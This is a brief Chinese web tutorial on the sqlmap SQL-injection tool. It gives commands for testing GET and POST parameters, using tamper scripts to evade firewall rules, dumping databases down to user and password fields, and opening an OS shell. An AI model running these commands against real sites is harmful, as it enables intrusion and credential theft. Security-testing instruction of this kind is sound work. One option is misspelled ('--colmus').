- 資訊首頁(yè) > 網(wǎng)絡(luò )安全 >
- 什么是sqlmap
本篇文章為大家展示了什么是sqlmap,內容簡(jiǎn)明扼要并且容易理解,絕對能使你眼前一亮,通過(guò)這篇文章的詳細介紹希望你能有所收獲。
運行環(huán)境為kali
首先是get方式傳值情況,需要把傳輸數據名一起帶上,如:?id=1
簡(jiǎn)單指令為:sqlmap -u 'http://xxxxxxxxxx?id=1'
post方式需要先導出為文本文件,以包的方式測試注入
首先使用抓包工具捕獲數據包,這里使用burp抓包,右鍵導出數據包保存為txt
保存后鍵入命令:sqlmap -r /root/post.txt /root/post.txt為導出的數據包。
執行后即可驗證是否存在sql注入
使用 --tamper引用替換方式繞過(guò)
使用方式為鍵入sqlmap -u 'http://xxxxxx' --tamper=xxxx.py
xxxx.py的選擇需要根據數據庫類(lèi)型,防護設備規則來(lái)選擇,sqlmap自帶了一些繞過(guò)腳本,可打開(kāi)tamper目錄或者鍵入sqlmap --list-tampers查看
最好摸索規則自己編寫(xiě)繞過(guò)腳本
檢測到注入點(diǎn)后最常用的就是爆數據庫
上述參數后加 --dbs --tables --colmus --dump逐級深入
--dbs獲取全部數據庫
-D XXX --tables 獲取xxx數據庫里的表
-D xxx -T sss --columns 獲取XXX表里的SSS字段
-D xxx -T sss -C “user,password” 獲取字段user,password里的數據
再提一個(gè) --os-shell 網(wǎng)站權限有寫(xiě)的權限可以生成一個(gè)上傳點(diǎn)
免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng )、來(lái)自本網(wǎng)站內容采集于網(wǎng)絡(luò )互聯(lián)網(wǎng)轉載等其它媒體和分享為主,內容觀(guān)點(diǎn)不代表本網(wǎng)站立場(chǎng),如侵犯了原作者的版權,請告知一經(jīng)查實(shí),將立刻刪除涉嫌侵權內容,聯(lián)系我們QQ:712375056,同時(shí)歡迎投稿傳遞力量。
Copyright ? 2009-2022 56dr.com. All Rights Reserved. 特網(wǎng)科技 特網(wǎng)云 版權所有 特網(wǎng)科技 粵ICP備16109289號
域名注冊服務(wù)機構:阿里云計算有限公司(萬(wàn)網(wǎng)) 域名服務(wù)機構:煙臺帝思普網(wǎng)絡(luò )科技有限公司(DNSPod) CDN服務(wù):阿里云計算有限公司 百度云 中國互聯(lián)網(wǎng)舉報中心 增值電信業(yè)務(wù)經(jīng)營(yíng)許可證B2
建議您使用Chrome、Firefox、Edge、IE10及以上版本和360等主流瀏覽器瀏覽本網(wǎng)站